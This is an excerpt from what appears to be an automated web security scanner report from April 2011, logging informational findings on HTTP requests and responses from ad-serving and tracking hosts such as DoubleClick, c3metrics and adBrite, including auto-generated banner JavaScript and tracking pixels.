var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BNLExpz-0TdqcDsmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AViJwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgEbZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0yAEJ2gH_AWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvcGFnZWFkL2Fkcz9jbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2Mzgmb3V0cHV0PWh0bWwmaD05MCZzbG90bmFtZT05NTI0OTU2NzkyJnc9NzI4JmxtdD0xMzAzNjc2NDAwJmVhPTAmZmxhc2g9MTAuMi4xNTQmdXJsPWh0dHAlM0ElMkYlMkZwdWIucmV0YWlsZXItYW1hem9uLm5ldCUyRmJhbm5lcl83MjhfOTBfYi5waHAlM0ZzZWFyY2glM0QlN0IlMjRrZXl3b3JkJTdEJmR0PTEzMDM2NcACAqgDAdgEgK3iBOAEApoFGAjB1z8Q-PChHBiG0KBwIInAnBMotYaZAdoFAggA&num=0&sig=AGiWqty7hSovbSMgwz5PNQ-2EZ55520OVA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/%3Fsite%3Dc-xxx%26utm_term%3Dbanner1c%26utm_source%3Den-na-ha-rm-xxx%26utm_medium%3Dad%26utm_campaign%3Den");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'
...[SNIP]...

Request 2

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4;sz=728x90;u=xbAGfINSIcy2XbsWwiQm12CTNkQYSTHPZADTxjxxBC2NTVgiv1DnGxT7jMRSV3fSsjDK_1O1i4gsgBOsJatCEzmlIWvGL5ueuCVQ;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:20:24 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6118

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
f = "http://s1.2mdn.net/2675039/1-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BrtgIuD-0TenkEsmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AViJwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxD48KEcGIbQoHAgicCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtzECvUK3B8Tfy5VbD7bcwLBltJIDQ&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=c-invite&utm_term=banner1c&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BrtgIuD-0TenkEsmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AViJwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxD48KEcGIbQoHAgicCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtzECvUK3B8Tfy5VbD7bcwLBltJIDQ&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/%3Fsite%3Dc-xxx%26utm_term%3Dbanner1c%26utm_source%3Den-na-ha-rm-xxx%26utm_medium%3Dad%26utm_campaign%3Den");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BrtgIuD-0TenkEsmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AViJwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxD48KEcGIbQoHAgicCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtzECvUK3B8Tfy5VbD7bcwLBltJIDQ&client=&adurl=" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
el
...[SNIP]...

21.2. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.5  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5

Request 1

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSKt5nVliGWhRj1MkmJLkabfPvqs_JGh9sR1hXYoWegOCq95Gmt37Sv9G4e-8FS4YZq9MZuUQN6XXQcURsfNWtBOq4xvbw;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676476&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658476068&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658476073&frm=1&adk=2614322350&ga_vid=946321799.1303658476&ga_sid=1303658476&ga_hid=1959143377&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:26:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7589

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
nner_BLUE_tag.swf";
var gif = "http://s1.2mdn.net/2675039/img1_160_600.jpg";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bsk9wD0G0TcabKMmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AVipwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgEbZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0yAEJ2gH_AWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvcGFnZWFkL2Fkcz9jbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2Mzgmb3V0cHV0PWh0bWwmaD02MDAmc2xvdG5hbWU9MjQ2NTA5MDYxNiZ3PTE2MCZsbXQ9MTMwMzY3NjQ3NiZlYT0wJmZsYXNoPTEwLjIuMTU0JnVybD1odHRwJTNBJTJGJTJGcHViLnJldGFpbGVyLWFtYXpvbi5uZXQlMkZiYW5uZXJfMTIwXzYwMF9iLnBocCUzRnNlYXJjaCUzRCU3QiUyNGtleXdvcmQlN0QmZHQ9MTMwM8ACAqgDAdgEgK3iBOAEApoFGAjB1z8Ql_GhHBjd0aBwIKnAnBMotYaZAdoFAggA&num=0&sig=AGiWqtw-CdkFX6uV0R2dOqY6nszYLztdqA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=uc-invite&utm_term=banner2uc&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bsk9wD0G0TcabKMmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AVipwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgEbZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0yAEJ2gH_AWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvcGFnZWFkL2Fkcz9jbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2Mzgmb3V0cHV0PWh0bWwmaD02MDAmc2xvdG5hbWU9MjQ2NTA5MDYxNiZ3PTE2MCZsbXQ9MTMwMzY3NjQ3NiZlYT0wJmZsYXNoPTEwLjIuMTU0JnVybD1odHRwJTNBJTJGJTJGcHViLnJldGFpbGVyLWFtYXpvbi5uZXQlMkZiYW5uZXJfMTIwXzYwMF9iLnBocCUzRnNlYXJjaCUzRCU3QiUyNGtleXdvcmQlN0QmZHQ9MTMwM8ACAqgDAdgEgK3iBOAEApoFGAjB1z8Ql_GhHBjd0aBwIKnAnBMotYaZAdoFAggA&num=0&sig=AGiWqtw-CdkFX6uV0R2dOqY6nszYLztdqA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/%3Fsite%3Dc-xxx%26utm_term%3Dbanner1c%26utm_source%3Den-na-ha-rm-xxx%26utm_medium%3Dad%26utm_campaign%3Den");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'
...[SNIP]...

Request 2

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSKt5nVliGWhRj1MkmJLkabfPvqs_JGh9sR1hXYoWegOCq95Gmt37Sv9G4e-8FS4YZq9MZuUQN6XXQcURsfNWtBOq4xvbw;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:26:24 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6049

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
nner_BLUE_tag.swf";
var gif = "http://s1.2mdn.net/2675039/img1_160_600.jpg";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bod3tIEG0TejaN5S96AahyZD6CwAAAAAQASAAOABQ3eLz1vj_____AVipwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxCX8aEcGN3RoHAgqcCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtyGJEdQ3K9UM0YY3eOl-D4O1NiLiA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=uc-invite&utm_term=banner2uc&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bod3tIEG0TejaN5S96AahyZD6CwAAAAAQASAAOABQ3eLz1vj_____AVipwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxCX8aEcGN3RoHAgqcCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtyGJEdQ3K9UM0YY3eOl-D4O1NiLiA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/%3Fsite%3Dc-xxx%26utm_term%3Dbanner1c%26utm_source%3Den-na-ha-rm-xxx%26utm_medium%3Dad%26utm_campaign%3Den");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bod3tIEG0TejaN5S96AahyZD6CwAAAAAQASAAOABQ3eLz1vj_____AVipwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUYCMHXPxCX8aEcGN3RoHAgqcCcEyi1hpkB2gUCCAA&num=0&sig=AGiWqtyGJEdQ3K9UM0YY3eOl-D4O1NiLiA&client=&adurl=" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}

...[SNIP]...

21.3. http://breathe.c3metrics.com/c3realview.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Request 1

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s11

Response 1

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:37 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9583

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3CJSSPlitchar:"-",c3CJSSearchString:null,c3CJSqueryVar:new Array(),c3CJSvtImg:"/1.gif",c3thisFileName:'c3metrics.php',c3CJSrvSetup:'Y',c3CJSuiSetup:'Y',c3SMfireOption:'N',c3SMfireTag:0,c3SMfireJs:'/smfire.js',c3SMcreation:1,c3VJSvtlog:'http://breathe.c3metrics.com/'+'ctcall.php',c3CTI:0,c3STI:0},c3CJScollectQueStr:function(){var Questr;var docuRefer=document.referrer;var searchStr=new Array();var searchSubStr=new Array();if(docuRefer!=null)searchStr=docuRefer.split('?');if(searchStr[1]!=null)searchSubStr=searchStr[1].split('&');var searchSubStrLen=searchSubStr.length;if(searchSubStrLen==1){Questr=searchSubStr[0]}else{for(i=0;i<searchSubStrLen;i++){var temp=searchSubStr[i].charAt(0);if(temp=="q"||temp=="p"){Questr=String(searchSubStr[i]);break}}}if(Questr==null||Questr=="")Questr="";var intIndexOfMatch=Questr.indexOf("+");while(intIndexOfMatch!=-1){Questr=Questr.replace("+"," ");intIndexOfMatch=Questr.indexOf("+")}return Questr},c3CJSgetDomain:function(){this.c3CJS.c3CJSdomain=document.domain;var doArr=new Array();doArr=this.c3CJS.c3CJSdomain.split('.');var doArrLength=doArr.length;this.c3CJS.c3CJSdomain='.'+doArr[doArrLength-2]+'.'+doArr[doArrLength-1]},c3CJSptq:function(q){var x=q.replace(/;/g,'&').split('&'),i,name,t;for(q={},i=0;i<x.length;i++){t=x[i].split('=',2);name=unescape(t[0]);for(var j=0;j<this.c3CJS.c3CJSqueryVar.length;j++){if(this.c3CJS.c3CJSqueryVar[j]==name){name='campaign'}}if(!q[name]){q[name]=[]}if(t.length>1){q[name][q[name].length]=unescape(t[1])}else{q[name][q[name].length]=true}}return q},c3CJSparam:function(){return this.c3CJSptq(location.search.substring(1).replace(/\+/g,' '))},c3CJSset_cookie:function(str,expire,path,domain,secure){var cookie_string=str;if(expire){cookie_string+="; expires="+expire}if(path){cookie_string+="; path="+escape(path)}
...[SNIP]...

Request 2

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s11

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:40 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 49
Connection: close
Content-Type: image/gif
X-Pad: avoid browser bug

GIF89a...................!.......,...........T..;

21.4. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Request 1

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:40 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:40 GMT
Set-Cookie: vsd=0@1@4db48bb8@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:40 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:50 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1i0Y34W2MDCIYG41EHe8e9PZv4LXwA1dsNeW9wEPE9aokqxNR0sUUWzIp3e1g1qBET4fBFphjPv%2BCOT8%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:50 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.5. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.w55c.net
Path:   /afr.php

Request 1

GET /afr.php?zoneid=768&cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response 1

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=1afbb964a14b8098516b6fdbef7997dd; expires=Mon, 23-Apr-2012 15:19:39 GMT; path=/
Content-Length: 4729
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<div id='ox_7b059c0c1d35ec0ee254d91fc5d9144d' style='display: inline;'><a href='http://d.w55c.net/ck.php?oaparams=2__bannerid=750__zoneid=768__OXLCA=1__cb=09f5497279__r_id=02cca2bec6220e612be93de97e65b9a1__r_ts=lk5x8r__oadest=http%3A%2F%2Fwww.dallasareamazda.com%3Futm_source%3Ddataxu%26utm_medium%3Ddisplay%26utm_campaign%3DmazdaCX9%26so_utm%3D46fa0bac2e96ffe1ea882f640b8318e5' target='_blank'><img src='http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/f21/f217ad5fe4a807573e356cc4a195fc47.gif' width='728' height='90' alt='' title='' border='0' /></a></div>
<script type='text/javascript'><!--// <![CDATA[
